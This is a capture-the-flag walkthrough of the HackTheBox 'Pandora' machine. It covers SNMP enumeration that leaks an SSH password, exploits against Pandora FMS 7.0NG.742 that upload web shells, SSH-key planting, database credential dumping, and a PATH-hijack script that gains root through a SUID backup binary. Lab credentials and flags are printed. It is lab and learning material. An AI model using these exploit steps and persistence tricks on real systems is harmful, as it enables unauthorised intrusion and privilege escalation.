Pandora

Recon

nmap_scan.log

Open 10.129.71.80:22
Open 10.129.71.80:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -sC -Pn" on ip 10.129.71.80

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDPIYGoHvNFwTTboYexVGcZzbSLJQsxKopZqrHVTeF8oEIu0iqn7E5czwVkxRO/icqaDqM+AB3QQVcZSDaz//XoXsT/NzNIbb9SERrcK/n8n9or4IbXBEtXhRvltS8NABsOTuhiNo/2fdPYCVJ/HyF5YmbmtqUPols6F5y/MK2Yl3eLMOdQQeax4AWSKVAsR+issSZlN2rADIvpboV7YMoo3ktlHKz4hXlX6FWtfDN/ZyokDNNpgBbr7N8zJ87+QfmNuuGgmcZzxhnzJOzihBHIvdIM4oMm4IetfquYm1WKG3s5q70jMFrjp4wCyEVbxY+DcJ54xjqbaNHhVwiSWUZnAyWe4gQGziPdZH2ULY+n3iTze+8E4a6rxN3l38d1r4THoru88G56QESiy/jQ8m5+Ang77rSEaT3Fnr6rnAF5VG1+kiA36rMIwLabnxQbAWnApRX9CHBpMdBj7v8oLhCRn7ZEoPDcD1P2AASdaDJjRMuR52YPDlUSDd8TnI/DFFs=
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNNJGh4HcK3rlrsvCbu0kASt7NLMvAUwB51UnianAKyr9H0UBYZnOkVZhIjDea3F/CxfOQeqLpanqso/EqXcT9w=
|   256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOCMYY9DMj/I+Rfosf+yMuevI7VFIeeQfZSxq67EGxsb
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80)

Website is serving HTML files and form goes to HTML itself, so most probably nothing from this domain.

Subdomain enumeration comes empty handed too

└─$ domain='panda.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl 908

SSH is almost never vulnerable, HTTP has nothing, no subdomains or hidden path 🤔 Feels like TCP doesn't haven any vulnerabilities. Let's try UDP scan before moving on.

SNMP

└─$ sudo nmap -n -sU -F --max-retries 1 --open panda.htb
PORT    STATE SERVICE
161/udp open  snmp

SNMP is open -> https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp

Setup for better enumeration:

└─$ sudo apt-get install snmp-mibs-downloader -y
download-mibs
# Finally comment the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf

Start enum:

└─$ snmpbulkwalk -c public -v2c 10.129.71.80 . | tee snmp.log
...
HOST-RESOURCES-MIB::hrSWRunParameters.972 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
HOST-RESOURCES-MIB::hrSWRunParameters.982 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
HOST-RESOURCES-MIB::hrSWRunParameters.984 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.989 = STRING: "-o -p -- \\u --noclear tty1 linux"
HOST-RESOURCES-MIB::hrSWRunParameters.1038 = ""
HOST-RESOURCES-MIB::hrSWRunParameters.1039 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.1125 = STRING: "-u daniel -p HotelBabylon23"
...

SSH (daniel)

└─$ sshpass -p HotelBabylon23 ssh daniel@panda.htb
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)

daniel@pandora:/var/www/pandora/pandora_console$ cat /etc/apache2/sites-enabled/pandora.conf
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

Port forward the application

└─$ sshpass -p HotelBabylon23 ssh daniel@panda.htb -L 8000:0:80

From frontend we see version is v7.0NG.742_FIX_PERL2020, it can also be found in config_process.php

daniel@pandora:/var/www/pandora/pandora_console$ cat ./include/config_process.php | grep _version
$build_version = 'PC200103';
$pandora_version = 'v7.0NG.742_FIX_PERL2020';

SSH (matt)

exploit-CVE-2020-5844

└─$ git clone -q https://github.com/UNICORDev/exploit-CVE-2020-5844.git
└─$ py exploit-CVE-2020-5844/exploit-CVE-2020-5844.py -t 127.0.0.1 8000 -u daniel HotelBabylon23
UNICORD: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
OPTIONS: Web Shell Mode
USERNAME: daniel
PASSWORD: HotelBabylon23
WEBFILE: unicord.php
WEBSITE: http://127.0.0.1:8000/pandora_console
PHPSESS: dee7h37beh357356o48mem3d4m
ERRORED: Invalid credentials!
EXPLOIT: Connected to website! Status Code: 200
EXPLOIT: Logged into Pandora FMS!
EXPLOIT: Web shell uploaded!
SUCCESS: Web shell available at: http://127.0.0.1:8000/pandora_console/images/unicord.php?cmd=whoami

└─$ curl http://127.0.0.1:8000/pandora_console/images/unicord.php?cmd=whoami
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>

CVE failed, can't read config and only matt can read it.

daniel@pandora:/var/www/pandora/pandora_console$ ls -alh ./include/config.php
-rw------- 1 matt matt 413 Dec  3  2021 ./include/config.php

Pandora_v7.0NG.742_exploit_unauthenticated -> Pandora FMS 742: Critical Code Vulnerabilities Explained

└─$ git clone -q https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git
└─$ py Pandora_v7.0NG.742_exploit_unauthenticated/sqlpwn.py -t 127.0.0.1:8000
URL:  http://127.0.0.1:8000/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : nudijm8drqtrr94j5qkf6nuv5r
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8000/pandora_console/images/pwn.php?test=
CMD > id
uid=1000(matt) gid=1000(matt) groups=1000(matt)
---
└─$ ssh-keygen -f id_rsa -P x -q && cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken
---
CMD > ls /home/matt -alh
total 24K
drwxr-xr-x 2 matt matt 4.0K Dec  7  2021 .
drwxr-xr-x 4 root root 4.0K Dec  7  2021 ..
lrwxrwxrwx 1 matt matt    9 Jun 11  2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 matt matt 3.7K Feb 25  2020 .bashrc
-rw-r--r-- 1 matt matt  807 Feb 25  2020 .profile
-rw-r----- 1 root matt   33 Dec 11 19:02 user.txt

CMD > mkdir /home/matt/.ssh
CMD > echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken' > /home/matt/.ssh/authorized_keys

└─$ ssh -i id_rsa matt@panda.htb
matt@pandora:~$ id
uid=1000(matt) gid=1000(matt) groups=1000(matt)

User.txt

matt@pandora:~$ cat user.txt
c3ad8efa5ad16bc60cec796cb0650520

Privilege Escalation

matt@pandora:/var/www/pandora/pandora_console/include$ cat config.php
<?php
// File generated by centos kickstart
$config["dbtype"] = "mysql";
$config["dbname"]="pandora";
$config["dbuser"]="pandora";
$config["dbpass"]="PandoraFMSSecurePass2021";
$config["dbhost"]="localhost";
$config["homedir"]="/var/www/pandora/pandora_console";
$config["homeurl"]="/pandora_console";
error_reporting(0);
$ownDir = dirname(__FILE__) . '/';
include ($ownDir . "config_process.php");
?>

matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' -e 'SHOW DATABASES;'
+--------------------+
| Database           |
+--------------------+
| information_schema |
| pandora            |
+--------------------+
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' pandora -e 'SHOW TABLES;'
| tpassword_history                  |
matt@pandora:/var/www/pandora/pandora_console/include$ mysql -u 'pandora' -p'PandoraFMSSecurePass2021' pandora -e 'SELECT * FROM tpassword_history;'
+---------+---------+----------------------------------+---------------------+---------------------+
| id_pass | id_user | password                         | date_begin          | date_end            |
+---------+---------+----------------------------------+---------------------+---------------------+
|       1 | matt    | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 | 0000-00-00 00:00:00 |
|       2 | daniel  | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 | 0000-00-00 00:00:00 |
+---------+---------+----------------------------------+---------------------+---------------------+

No sudo for us, but we have SUID binaries

matt@pandora:/tmp$ find / -perm -4000 2>/dev/null
...
/usr/bin/pandora_backup
...

└─$ scp -i id_rsa matt@panda.htb:/usr/bin/pandora_backup .
└─$ file pandora_backup
pandora_backup: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
└─$ strings pandora_backup | grep -vE '^[._;]|GLIBC'
/lib64/ld-linux-x86-64.so.2
puts
setreuid
system
getuid
geteuid
libc.so.6
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*
Backup failed!
Check your permissions!
Backup successful!
Terminating program!
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
completed.0
frame_dummy
backup.c
main

The binary is using relative path instead of absolute path, we can hijack tar to be anything we want.

matt@pandora:/tmp$ nano tar
matt@pandora:/tmp$ cat tar
#!/bin/bash
mkdir /root/.ssh
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKIXJzrVhoHAuwPoxW4vwgWOBSZXtmH8CG08we2Z84v woyag@kraken' >> /root/.ssh/authorized_keys
install -m4777 /bin/bash /tmp/rootbash

SSH as root doesn't work because there's a deny rule

matt@pandora:/tmp$ cat /etc/ssh/sshd_config | grep Deny
DenyUsers root

Root.txt

matt@pandora:/tmp$ /tmp/rootbash -p
rootbash-5.0# cat /root/root.txt
3b7410b14d3d60daf56dc908f89798de

PreviousPC NextPaper

Last updated 8 months ago

hashtagRecon

hashtagHTTP (80)

hashtagSNMP

hashtagSSH (daniel)

hashtagSSH (matt)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagRoot.txt